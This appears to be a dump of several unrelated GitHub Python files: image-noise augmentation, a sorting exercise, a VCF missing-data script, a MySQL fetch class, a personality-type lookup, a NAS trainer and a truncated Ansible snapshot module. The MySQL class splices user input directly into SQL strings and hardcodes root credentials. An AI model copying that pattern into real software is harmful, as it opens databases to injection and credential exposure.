self.config.rgb_gaussian_blur_small_ratio:\n img = cv2.GaussianBlur(img, (3, 3), rng.rand())\n else:\n img = cv2.GaussianBlur(img, (5, 5), rng.rand())\n\n # add Gaussian noise of fixed sigma [0, 15/25) to image independently for each pixel\n if rng.rand() <= self.config.rgb_gaussian_noise_small_ratio:\n img = self.gaussian_noise(rng, img, sigma=rng.randint(15))\n else:\n img = self.gaussian_noise(rng, img, sigma=rng.randint(25))\n\n if rng.rand() <= self.config.rgb_normal_noise_ratio:\n # add Gaussian noise of sigma=7 to image independently for each pixel\n img = img + np.random.normal(loc=0.0, scale=7.0, size=img.shape)\n\n return np.clip(img, 0, 255).astype(np.uint8)\n\n def depth_img_add_noise(self, img, name=None):\n \"\"\"\n Add different types of noise to a depth image, e.g. additive Gaussian noise\n :param img: NumPy, depth image e.g. 
(480, 640)\n        :param name: file_name for debugging only\n        :return:\n        \"\"\"\n        rng = self.rng\n\n        if rng.rand() <= self.config.depth_normal_noise_ratio:\n            # add Gaussian noise of configurable scale to the image independently for each pixel\n            img += np.random.normal(loc=0.0, scale=self.config.depth_normal_noise_scale, size=img.shape).astype(np.float32)\n\n        return np.clip(img, 0, 1)\n\n    def add_real_back(self, rgb, labels, dpt, dpt_msk):\n        \"\"\"\n        Loads a real image, removes all objects and places the objects of the synthetic input image in front of the real background\n        :param rgb: synthetic RGB image, uint8 (480, 640, 3)\n        :param labels: corresponding semantic segmentation label, uint8 (480, 640)\n        :param dpt: corresponding depth image, int32 (480, 640)\n        :param dpt_msk: corresponding depth mask, bool (480, 640) -> indicates where dpt has values > 1e-6 # TODO: Why are they useful?\n        :return: rgb (480, 640, 3), dpt float64 (480, 640)\n        \"\"\"\n        real_item = self.real_gen()\n        with Image.open(os.path.join(self.root, real_item+'-depth.png')) as di:\n            real_dpt = np.array(di)\n        with Image.open(os.path.join(self.root, real_item+'-label.png')) as li:\n            bk_label = np.array(li)\n        bk_label = (bk_label <= 0).astype(rgb.dtype)\n        bk_label_3c = np.repeat(bk_label[:, :, None], 3, 2)\n        with Image.open(os.path.join(self.root, real_item + '-color.png')) as ri:\n            back = np.array(ri)[:, :, :3] * bk_label_3c\n        dpt_back = real_dpt.astype(np.float32) * bk_label.astype(np.float32)\n\n        msk_back = (labels <= 0).astype(rgb.dtype)\n        msk_back = np.repeat(msk_back[:, :, None], 3, 2)\n        rgb = rgb * (msk_back == 0).astype(rgb.dtype) + back * msk_back\n\n        dpt = dpt * (dpt_msk > 0).astype(dpt.dtype) + \\\n              dpt_back * (dpt_msk <= 0).astype(dpt.dtype)\n        return rgb, dpt\n\n    def dpt_2_pcld(self, dpt, cam_scale, K):\n        \"\"\"\n        converts a depth image into a depth_xyz map where at each pixel the corresponding 3d location is stored\n        :param dpt: depth image numpy array (h, w) e.g. (480, 640)\n        :param cam_scale: scalar e.g. 
1 or 10000\n :param K: camera intrinsic matrix, numpy array (3, 3)\n :return: depth_xyz map\n \"\"\"\n if len(dpt.shape) > 2:\n dpt = dpt[:, :, 0]\n dpt = dpt.astype(np.float32) / cam_scale\n msk = (dpt > 1e-8).astype(np.float32)\n row = (self.ymap - K[0][2]) * dpt / K[0][0]\n col = (self.xmap - K[1][2]) * dpt / K[1][1]\n dpt_3d = np.concatenate(\n (row[..., None], col[..., None], dpt[..., None]), axis=2\n )\n dpt_3d = dpt_3d * msk[:, :, None]\n return dpt_3d\n\n def __len__(self):\n if self.multi_view:\n try:\n return len(self.sequence_samples)\n except AttributeError:\n return len(self.pp_data)\n return len(self.all_lst)\n\n def get_sequence(self, sequence_ids):\n sequence = []\n for sequence_id in sequence_ids:\n sequence.append(self.get_item(sequence_id))\n return sequence\n\n def transform_offsets(self, camchange, origin, transformed_origin, offset):\n offset_points = origin + offset\n new_offset_points = self.transform_data(camchange, offset_points)\n new_offsets = new_offset_points - transformed_origin\n return new_offsets\n","repo_name":"boschresearch/SyMFM6D","sub_path":"datasets/dataset_base_class.py","file_name":"dataset_base_class.py","file_ext":"py","file_size_in_byte":8806,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"43113115747","text":"a, b, c = input().split()\n\na = int(a)\nb = int(b)\nc = int(c)\n\nif a>b and a>c and b>c: # a>b>c\n maior = a\n medio = b\n menor = c\nelif a>b and a>c and c>b: # a>c>b \n maior = a\n medio = c\n menor = b\nelif b>a and b>c and a>c: # b>a>c \n maior = b\n medio = a\n menor = c\nelif b>c and b>a and c>a: # b>c>a \n maior = b\n medio = c\n menor = a\nelif c>a and c>b and a>b: # c>a>b \n maior = c\n medio = a\n menor = b\nelse: # c>b>a \n maior = c\n medio = b\n menor = a\n\nprint('{}\\n{}\\n{}\\n\\n{}\\n{}\\n{}' .format(menor, medio, maior, a, b, c))","repo_name":"gabrielleandro0801/beecrowd-exercises","sub_path":"Python/1042.py","file_name":"1042.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36225836206","text":"import os\nimport argparse\nimport gzip\n\n# create variables that can be entered in the command line\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', type=str, metavar='vcf_path', required=True, help='path to vcfs')\nparser.add_argument('-w', type=str, metavar='Window_Size', required=True, help='size of scaffold window')\nparser.add_argument('-dp', type=int, metavar='min_depth', required=True, help='minimum genotype depth to be considered non-missing')\nparser.add_argument('-o', type=str, metavar='output_path', required=True, help='full path of output file')\nparser.add_argument('-gz', type=str, metavar='gzipped?', required=True, help='are vcfs gzipped (true) or not (false)')\n\n\nargs = parser.parse_args()\n\nif args.v.endswith(\"/\") is False:\n args.v += \"/\"\nvcf_list = []\n\nfor file in os.listdir(args.v): # get names of vcf files in args.v directory\n if args.gz == 'true':\n if file[-3:] == '.gz':\n vcf_list.append(file)\n file.split(\".\")[-2]\n elif args.gz == 'false':\n if file[-3:] == 'vcf':\n vcf_list.append(file)\n\n else:\n print('use \"true\" or \"false\" for -gz')\n\n\n\nout1 = open(args.o, 'w')\nout1.write(\"scaff\\tstart\\tend\\tnumSites\\tmissing\\n\")\nfor iii, vcf in enumerate(vcf_list):\n if args.gz == 'true':\n src = gzip.open(args.v + vcf)\n elif args.gz == 'false':\n src = open(args.v + vcf)\n M = 0.0\n tot_count = 0\n 
site_count = 0\n start = 0\n end = int(args.w)\n window_size = int(args.w)\n # evaluate contents of each line of input file\n for line_idx, line in enumerate(src): # Cycle over lines in the VCF file\n cols = line.replace('\\n', '').split('\\t') # Split each line of vcf\n if line_idx % 10000 == 0:\n print(line_idx)\n if len(cols) < 2: # This should be info just before header\n pass\n elif cols[0] == \"#CHROM\": # This should be header\n pass\n else:\n genos = []\n scaff = cols[0] # parse important info from each line\n pos = int(cols[1])\n info = cols[7].split(\";\")\n AN = float(info[2].split(\"=\")[1])\n AC = float(info[0].split(\"=\")[1])\n num_missing = 0\n num_ind = float(len(cols[9:]))\n m = 0.0\n if pos > start and pos <= end:\n site_count += 1\n for ind in cols[9:]:\n ind = ind.split(\":\")\n geno = ind[0].split(\"/\")\n if geno[0] == \".\":\n m += 1.0 / num_ind\n else:\n try:\n if int(ind[2]) < args.dp:\n m += 1.0 / num_ind\n except (IndexError, ValueError):\n pass\n M += m\n\n elif pos > end:\n M = M / float(site_count)\n out1.write(scaff + '\\t' +\n str(start) + '\\t' +\n str(end) + '\\t' +\n str(args.w) + '\\t' +\n str(site_count) + '\\t' +\n str(M) + '\\n')\n site_count = 0\n M = 0.0\n\n while pos > end:\n end += window_size\n start = end - window_size\n if pos > end:\n out1.write(scaff + '\\t' +\n str(start) + '\\t' +\n str(end) + '\\t' +\n str(args.w) + '\\t' +\n str(site_count) + '\\t' +\n str(-99) + '\\n')\n\n if int(pos) > start and int(pos) <= end:\n site_count += 1\n for ind in cols[9:]:\n ind = ind.split(\":\")\n geno = ind[0].split(\"/\")\n if geno[0] == \".\":\n m += 1.0 / num_ind\n else:\n try:\n if int(ind[2]) < args.dp:\n m += 1.0 / num_ind\n except (IndexError, ValueError):\n pass\n M += m\n\n\n out1.write(scaff + '\\t' +\n str(start) + '\\t' +\n str(end) + '\\t' +\n str(args.w) + '\\t' +\n str(site_count) + '\\t' +\n str(M) + '\\n')\n\n\nout1.close()\n","repo_name":"pmonnahan/ScanTools","sub_path":"MissingData.py","file_name":"MissingData.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"35103896225","text":"import mysql.connector\nmsc=[]\ndata=[]\n\nclass Conexion_fetchdata():\n def __init__(self):\n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"iot\")\n\n def fetch(self, db_type, op_type, data_type):\n if(db_type == \"cons_reg\"):\n if(op_type == \"todos\" or op_type == \"all\"): query = \"SELECT * FROM reg\"\n else: query = \"SELECT * FROM reg WHERE nombre ='%s'\"%(data_type)\n else:\n if(op_type == \"todos\" or op_type == \"all\"): query = \"SELECT * FROM roc\"\n else: query = \"SELECT * FROM roc WHERE nombre ='%s'\"%(data_type)\n\n msc.clear()\n data.clear()\n\n mycursor = self.mydb.cursor()\n mycursor.execute(query)\n myresult = mycursor.fetchall()\n for i in range(0,len(myresult)):\n for z in range(0,len(myresult[0])):\n msc.append(str(myresult[i][z]).replace(\" \",\"_\"))\n \n data.insert(i, msc.copy())\n msc.clear()\n return data\n\n\n","repo_name":"b1ack0u7/IOT","sub_path":"Scripts/sql/sql_conexion.py","file_name":"sql_conexion.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13890897923","text":"# The task you have to perform is “Foods and Calories.” This task consists of a total of 15 points to evaluate your performance.\n\n# Problem Statement:-\n# You visited a restaurant called 
CodeWithHarry, and the food items in that restaurant are sorted based on their amount of calories. You have to reverse this list of food items containing calories.\n\n# You have to use the following three methods to reverse a list:\n\n# Inbuilt method of Python\n# List name [::-1] slicing trick\n# Swap the first element with the last one and second element with second last one and so on like,\n# [6 7 8 34 5] -> [5 34 8 7 6]\n\n# Input:\n# Take a list as an input from the user\n\n# [5, 4, 1]\n\n# Output:\n# [1, 4, 5]\n\n# [1, 4, 5]\n\n# [1, 4, 5]\n\n# All three methods give the same results!\ns = input(\"sir please enter your set of values: \")\ns = s.replace(\",\", \" \")\ns = s.split()\nlist2 = s.copy()\ni = 0\nfor j in range(len(list2)-1,0,-1):\n    list2[j] = s[i]\n    i+=1\nlist2[0] = s[i]\nprint(list2)\n# using list slicing in python\nsp = s[::-1]\nprint(sp)\n# using the reverse method in python\ns.reverse()\nprint(s)","repo_name":"rajesh604/python","sub_path":"practice_problems/practice_problem_2.py","file_name":"practice_problem_2.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"71884931392","text":"def get_type_test(type1, type2, type3, type4):\n    code = \"\"\n    code += \"E\" if type4 > 0 else \"I\"\n    code += \"N\" if type3 > 0 else \"S\"\n    code += \"T\" if type2 > 0 else \"F\"\n    code += \"P\" if type1 > 0 else \"J\"\n    desc4 = [\"Steady\", \"Fluid\"]\n    desc3 = [\"Cool-head\", \"Warm-heart\"]\n    desc2 = [\"Efficient\", \"Creative\"]\n    desc1 = [\"Multiplayer\", \"Singleplayer\"]\n    descKR4 = [\"꾸준하며\", \"유연하며\"]\n    descKR3 = [\"냉철한 이성의\", \"따뜻한 마음씨의\"]\n    descKR2 = [\"효율적인\", \"창의적인\"]\n    descKR1 = [\"협동가\", \"자립가\"]\n    \n    gbti_dict = {\n        \"ENFJ\":{\"code\":\"ENFJ\", \"nickname\":\"Twilight\", \"nicknameKR\":\"해 질 녘\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[1], descKR1[0]])},\n        \"INTJ\":{\"code\":\"INTJ\", \"nickname\":\"Deep Ocean\", \"nicknameKR\":\"심해\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[1], descKR1[1]])},\n        \"ESFJ\":{\"code\":\"ESFJ\", \"nickname\":\"Morning Dew\", \"nicknameKR\":\"아침 이슬\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[0], descKR1[0]])},\n        \"ISTJ\":{\"code\":\"ISTJ\", \"nickname\":\"Fog City\", \"nicknameKR\":\"안개 도시\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[0], descKR1[1]])},\n        \"ISTP\":{\"code\":\"ISTP\", \"nickname\":\"Summer Shower\", \"nicknameKR\":\"소나기\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[0], descKR1[1]])},\n        \"INFP\":{\"code\":\"INFP\", \"nickname\":\"Snowflake\", \"nicknameKR\":\"눈송이\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[1], descKR1[1]])},\n        \"ENFP\":{\"code\":\"ENFP\", \"nickname\":\"Rainbow Cloud\", \"nicknameKR\":\"무지개 구름\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[1], descKR1[0]])},\n        \"ISFJ\":{\"code\":\"ISFJ\", \"nickname\":\"Salt Lake\", \"nicknameKR\":\"염수호\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[0], descKR1[1]])},\n        
\"INFJ\":{\"code\":\"INFJ\", \"nickname\":\"Moonlight\", \"nicknameKR\":\"달빛\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[1], descKR1[1]])},\n \"ESFP\":{\"code\":\"ESFP\", \"nickname\":\"Spring Breeze\", \"nicknameKR\":\"봄바람\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[0], descKR1[0]])},\n \"ISFP\":{\"code\":\"ISFP\", \"nickname\":\"Cherry Blossom\", \"nicknameKR\":\"벚꽃\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[0], descKR1[1]])},\n \"ENTJ\":{\"code\":\"ENTJ\", \"nickname\":\"Dawn Breathe\", \"nicknameKR\":\"새벽 숨\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[1], descKR1[0]])},\n \"INTP\":{\"code\":\"INTP\", \"nickname\":\"Blue Hour\", \"nicknameKR\":\"여명 빛\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[1], descKR1[1]])},\n \"ESTJ\":{\"code\":\"ESTJ\", \"nickname\":\"Dune Line\", \"nicknameKR\":\"사구선\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[0], descKR1[0]])},\n \"ESTP\":{\"code\":\"ESTP\", \"nickname\":\"Lightning Flash\", \"nicknameKR\":\"번개 섬광\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[0], descKR1[0]])},\n \"ENTP\":{\"code\":\"ENTP\", \"nickname\":\"Blinking Star\", \"nicknameKR\":\"깜박이별\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[1], descKR1[0]])},\n }\n gbti_combi_dict = {\n \"ENFJ\":{\"pos\":[\"INFP\"], \"neg\":[\"ISTJ\"]},\n \"INTJ\":{\"pos\":[\"ENTP\"], \"neg\":[\"ESFJ\"]},\n \"ESFJ\":{\"pos\":[\"ISFP\"], \"neg\":[\"INTJ\"]},\n \"ISTJ\":{\"pos\":[\"ESTP\"], \"neg\":[\"ENFJ\"]},\n \"ISTP\":{\"pos\":[\"ESTJ\"], \"neg\":[\"ENFP\"]},\n \"INFP\":{\"pos\":[\"ENFJ\"], \"neg\":[\"ESTP\"]},\n \"ENFP\":{\"pos\":[\"INFJ\"], \"neg\":[\"ISTP\"]},\n \"ISFJ\":{\"pos\":[\"ESFP\"], \"neg\":[\"ENTJ\"]},\n \"INFJ\":{\"pos\":[\"ENFP\"], \"neg\":[\"ESTJ\"]},\n \"ESFP\":{\"pos\":[\"ISFJ\"], \"neg\":[\"INTP\"]},\n \"ISFP\":{\"pos\":[\"ESFJ\"], \"neg\":[\"ENTP\"]},\n \"ENTJ\":{\"pos\":[\"INTP\"], \"neg\":[\"ISFJ\"]},\n \"INTP\":{\"pos\":[\"ENTJ\"], \"neg\":[\"ESFP\"]},\n \"ESTJ\":{\"pos\":[\"ISTP\"], \"neg\":[\"INFJ\"]},\n \"ESTP\":{\"pos\":[\"ISTJ\"], \"neg\":[\"INFP\"]},\n \"ENTP\":{\"pos\":[\"INTJ\"], \"neg\":[\"ISFP\"]},\n }\n gbti_dict[code][\"pos\"] = [gbti_dict[pos_code] for pos_code in gbti_combi_dict[code][\"pos\"]]\n gbti_dict[code][\"neg\"] = [gbti_dict[neg_code] for neg_code in gbti_combi_dict[code][\"neg\"]]\n return gbti_dict[code]\n\ndef get_type_analysis(type_list):\n icon = {\n \"icon0\":[\"bi-sun-fill\", \"bi-moon-fill\"],\n \"icon1\":[\"bi-lightning-fill\", \"bi-tree-fill\", \"bi-fire\"],\n \"icon2\":[\"bi-people-fill\", \"bi-person-fill\"]\n }\n msg = {\n \"msg0\":[\"Sunflower\", \"Night Owl\"],\n \"msg1\":[\"Initiator\", \"Evergreen\", \"Burning\"],\n \"msg2\":[\"Together\", \"Independent\"]\n }\n msgKR = {\n \"msgKR0\":[\"주로 낮에 활동합니다.\", \"주로 밤에 활동합니다.\"],\n \"msgKR1\":[\"프로젝트 초반에 주로 활약합니다.\", \"프로젝트에 전반적으로 활약합니다.\", \"프로젝트 후반에 주로 활약합니다.\"],\n \"msgKR2\":[\"함께 작업하는 편입니다.\", \"혼자서 작업하는 편입니다.\"]\n }\n \n result, resultKR, result_icon = [], [], []\n def split_type(k, n, crtr=[0]):\n if 
n == 2:\n if type_list[int(k)] < crtr[0]:\n result.append(msg[\"msg\"+k][0])\n resultKR.append(msgKR[\"msgKR\"+k][0])\n result_icon.append(icon[\"icon\"+k][0])\n else:\n result.append(msg[\"msg\"+k][1])\n resultKR.append(msgKR[\"msgKR\"+k][1])\n result_icon.append(icon[\"icon\"+k][1])\n elif n == 3:\n if type_list[int(k)] < crtr[0]:\n result.append(msg[\"msg\"+k][0])\n resultKR.append(msgKR[\"msgKR\"+k][0])\n result_icon.append(icon[\"icon\"+k][0])\n elif type_list[int(k)] < crtr[1]:\n result.append(msg[\"msg\"+k][1])\n resultKR.append(msgKR[\"msgKR\"+k][1])\n result_icon.append(icon[\"icon\"+k][1])\n else:\n result.append(msg[\"msg\"+k][2])\n resultKR.append(msgKR[\"msgKR\"+k][2])\n result_icon.append(icon[\"icon\"+k][2])\n \n split_type(\"0\", 2, [0])\n split_type(\"1\", 3, [-0.4, 0.4])\n split_type(\"2\", 2, [0])\n \n return result, resultKR, result_icon\n","repo_name":"SKKU-OSP/SKKU-OSP","sub_path":"osp/user/templatetags/gbti.py","file_name":"gbti.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"24671608163","text":"import glob\nimport os\nimport shutil\n\nimport autokeras as ak\nimport numpy as np\nimport tensorflow as tf\n\nfrom callbacks import create_callbacks\nfrom layers import MSEWeighted\nfrom networks import NAS_automodel as model\n\n\nclass Trainer:\n def __init__(\n self,\n save_model_path,\n auto_model_params,\n update_params,\n nas_params,\n network_name,\n fit_params,\n options=None,\n ):\n\n self.network_name = network_name\n self.save_model_path = save_model_path\n\n self.auto_model_params = auto_model_params\n self.nas_params = nas_params\n self.update_params = update_params\n self.options = options\n\n self.loss = MSEWeighted(loss_affine=self.options[\"loss_affine\"])\n self.compile_params = dict(\n optimizer=tf.keras.optimizers.Adam(learning_rate=1e-3),\n loss=self.loss,\n run_eagerly=False,\n )\n self.fit_params = fit_params\n\n def train(self, x_train, y_train, x_val, y_val):\n \"\"\"Setup NAS graph and train NAS\"\"\"\n\n assert self.network_name in [\n \"prosub\",\n \"sardunet-nas\",\n ], \"choose in {prosub|sardunet-nas}\"\n graph_inputs_outputs = model(\n loss=self.loss,\n **self.nas_params,\n )\n\n auto_model = ak.AutoModel(**graph_inputs_outputs, **self.auto_model_params)\n callbacks = create_callbacks(**self.update_params)\n\n _ = auto_model.fit(\n **self.fit_params,\n x=x_train,\n y=y_train,\n validation_data=(x_val, y_val),\n callbacks=callbacks,\n )\n\n print(\"End of main NAS training\")\n\n def clean_up_trials(self, save_model_path):\n trials = glob.glob(save_model_path + \"/trial_*\")\n for trial_dir in trials:\n print(\"Removing {}\".format(trial_dir))\n shutil.rmtree(trial_dir)\n\n def load_predictor(self, postfix=\"last_model\", model=None, model_print=False):\n # https://stackoverflow.com/questions/52800025/keras-give-input-to-intermediate-layer-and-get-final-output\n if model is None:\n print(\"Total model loaded from',save_model_path\")\n if model_print:\n print(model.summary())\n save_model_path = os.path.join(self.save_model_path, postfix)\n model = tf.keras.models.load_model(\n save_model_path, custom_objects=ak.CUSTOM_OBJECTS, compile=False\n )\n\n m = model.get_layer(\"downsampling_mult_layer\").get_weights()[0]\n sigma_bar = model.get_layer(\"downsampling_mult_layer\").get_weights()[2]\n\n # Identify input index for predictor/reconstruction network\n S_end_layer = model.get_layer(\"DownsamplingOp\")\n for idx, layer in 
enumerate(model.layers):\n if layer.name == S_end_layer.name:\n idx_in = idx + 1 # next one goes to the predictor input\n input_shape = model.layers[0].get_input_shape_at(0)\n\n # Build predictor/reconstruction network\n new_input = tf.keras.Input(shape=input_shape[1:])\n x = new_input\n for layer in model.layers[idx_in:]:\n x = layer(x)\n P_model = tf.keras.Model(inputs=new_input, outputs=x)\n if model_print:\n print(\"Predictor model\", P_model.summary())\n\n return P_model, m, sigma_bar\n\n def evaluate(\n self,\n x_test,\n y_test,\n model=None,\n save_prediction=False,\n save_result=False,\n save_result_common=False,\n ):\n\n P_model, m, sigma_final = self.load_predictor(postfix=\"last_model\", model=model)\n\n # Could also load sigma_final, m from saved dir (previous version)\n print(\"Number of nonzero-measurements (check):\", np.sum(m != 0))\n x_test = sigma_final * m * x_test\n\n # prediction on test set\n y_pred = P_model.predict(\n x_test, batch_size=self.options[\"batch_size\"], verbose=2\n )\n loss = np.mean(self.loss(y_test, y_pred))\n if save_prediction:\n np.save(os.path.join(self.save_model_path, \"test_pred.npy\"), y_pred)\n if save_result:\n np.savetxt(os.path.join(self.save_model_path, \"test_result.txt\"), [loss])\n if save_result_common:\n os.makedirs(\n os.path.join(self.options[\"out_base\"], \"results\"), exist_ok=True\n )\n save_file = os.path.join(\n self.options[\"out_base\"], \"results\", self.options[\"proj_name\"] + \".npy\"\n )\n if os.path.exists(save_file):\n print(\"overwriting saved result\", save_file)\n print(\"Saving test result:\", save_file)\n np.save(save_file, loss)\n\n return loss\n","repo_name":"sbb-gh/PROSUB","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27610298741","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'NTT Ltd.'\n}\nDOCUMENTATION = '''\n---\nmodule: snapshot\nshort_description: Initiate, update or delete a manual snapshot on a server\ndescription:\n - Initiate a manual snapshot on a server\nversion_added: \"2.10.0\"\nauthor:\n - Ken Sinfield (@kensinfield)\noptions:\n auth:\n description:\n - Optional dictionary containing the authentication and API information for Cloud Control\n required: false\n type: dict\n suboptions:\n username:\n description:\n - The Cloud Control API username\n required: false\n type: str\n password:\n description:\n - The Cloud Control API user password\n required: false\n type: str\n api:\n description:\n - The Cloud Control API endpoint e.g. api-na.mcp-services.net\n required: false\n type: str\n api_version:\n description:\n - The Cloud Control API version e.g. 
2.11\n required: false\n type: str\n region:\n description:\n - The geographical region\n required: false\n type: str\n default: na\n datacenter:\n description:\n - The datacenter name\n required: false\n type: str\n network_domain:\n description:\n - The name of a Cloud Network Domain\n required: false\n type: str\n server:\n description:\n - The name of a server to enable Snapshots on\n required: false\n type: str\n server_id:\n description:\n - The UUID of a server to enable Snapshots on\n required: false\n type: str\n id:\n description:\n - The UUID of the snapshot to delete\n required: false\n type: str\n description:\n description:\n - Optional description for the manual snapshot\n required: false\n type: str\n state:\n description:\n - The action to be performed\n required: false\n type: str\n default: present\n choices:\n - present\n - absent\nnotes:\n - Requires NTT Ltd. MCP account/credentials\nrequirements:\n - requests\n - configparser\n - pyOpenSSL\n - netaddr\n'''\n\nEXAMPLES = '''\n- hosts: 127.0.0.1\n connection: local\n collections:\n - nttmcp.mcp\n tasks:\n\n - name: Initiate a manual snapshot\n snapshot_info:\n region: na\n datacenter: NA9\n server: myServer\n description: A random snapshot\n\n - name: Update the metadata on a manual snapshot\n snapshot_info:\n region: na\n id: 112b7faa-ffff-ffff-ffff-dc273085cbe4\n description: A random snapshot description\n\n - name: Delete a manual snapshot\n snapshot_info:\n region: na\n id: 112b7faa-ffff-ffff-ffff-dc273085cbe4\n state: absent\n'''\nRETURN = '''\ndata:\n description: Manual snapshot UUID\n returned: success\n type: str\n sample: 112b7faa-ffff-ffff-ffff-dc273085cbe4\nmsg:\n description: Message\n returned: fail\n type: str\n sample: Could not ascertain the status of the snapshot deletion. Check manually\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.nttmcp.mcp.plugins.module_utils.utils import get_credentials, get_regions\nfrom ansible_collections.nttmcp.mcp.plugins.module_utils.provider import NTTMCPClient, NTTMCPAPIException\n\n\ndef main():\n \"\"\"\n Main function\n :returns: Initiate a Snapshot\n \"\"\"\n module = AnsibleModule(\n argument_spec=dict(\n auth=dict(type='dict'),\n region=dict(default='na', type='str'),\n datacenter=dict(required=False, type='str'),\n network_domain=dict(required=False, default=None, type='str'),\n server=dict(required=False, default=None, type='str'),\n server_id=dict(required=False, default=None, type='str'),\n description=dict(required=False, default=None, type='str'),\n id=dict(required=False, default=None, type='str'),\n state=dict(default='present', choices=['present', 'absent'])\n ),\n supports_check_mode=True\n )\n state = module.params.get('state')\n result = None\n server = {}\n network_domain_name = module.params.get('network_domain')\n datacenter = module.params.get('datacenter')\n server_name = module.params.get('server')\n server_id = module.params.get('server_id')\n\n try:\n credentials = get_credentials(module)\n except ImportError as e:\n module.fail_json(msg='{0}'.format(e))\n\n # Check the region supplied is valid\n regions = get_regions()\n if module.params.get('region') not in regions:\n module.fail_json(msg='Invalid region. 
RETURN = '''\ndata:\n    description: Manual snapshot UUID\n    returned: success\n    type: str\n    sample: 112b7faa-ffff-ffff-ffff-dc273085cbe4\nmsg:\n    description: Message\n    returned: fail\n    type: str\n    sample: Could not ascertain the status of the snapshot deletion. Check manually\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.nttmcp.mcp.plugins.module_utils.utils import get_credentials, get_regions\nfrom ansible_collections.nttmcp.mcp.plugins.module_utils.provider import NTTMCPClient, NTTMCPAPIException\n\n\ndef main():\n    \"\"\"\n    Main function\n    :returns: Initiate a Snapshot\n    \"\"\"\n    module = AnsibleModule(\n        argument_spec=dict(\n            auth=dict(type='dict'),\n            region=dict(default='na', type='str'),\n            datacenter=dict(required=False, type='str'),\n            network_domain=dict(required=False, default=None, type='str'),\n            server=dict(required=False, default=None, type='str'),\n            server_id=dict(required=False, default=None, type='str'),\n            description=dict(required=False, default=None, type='str'),\n            id=dict(required=False, default=None, type='str'),\n            state=dict(default='present', choices=['present', 'absent'])\n        ),\n        supports_check_mode=True\n    )\n    state = module.params.get('state')\n    result = None\n    server = {}\n    network_domain_name = module.params.get('network_domain')\n    datacenter = module.params.get('datacenter')\n    server_name = module.params.get('server')\n    server_id = module.params.get('server_id')\n\n    try:\n        credentials = get_credentials(module)\n    except ImportError as e:\n        module.fail_json(msg='{0}'.format(e))\n\n    # Check the region supplied is valid\n    regions = get_regions()\n    if module.params.get('region') not in regions:\n        module.fail_json(msg='Invalid region. Regions must be one of {0}'.format(regions))\n\n    if credentials is False:\n        module.fail_json(msg='Could not load the user credentials')\n\n    try:\n        client = NTTMCPClient(credentials, module.params.get('region'))\n    except NTTMCPAPIException as e:\n        module.fail_json(msg=e.msg)\n\n    try:\n        if state == 'present':\n            if module.params.get('id') and module.params.get('description'):\n                if module.check_mode:\n                    module.exit_json(msg='The snapshot {0} will be updated with the description: {1}'.format(\n                        module.params.get('id'),\n                        module.params.get('description')\n                    ))\n                # If there is an ID and a description assume an update to the snapshot metadata\n                if client.update_snapshot(module.params.get('id'), module.params.get('description')):\n                    result = module.params.get('id')\n            else:\n                # Get the CND\n                try:\n                    network = 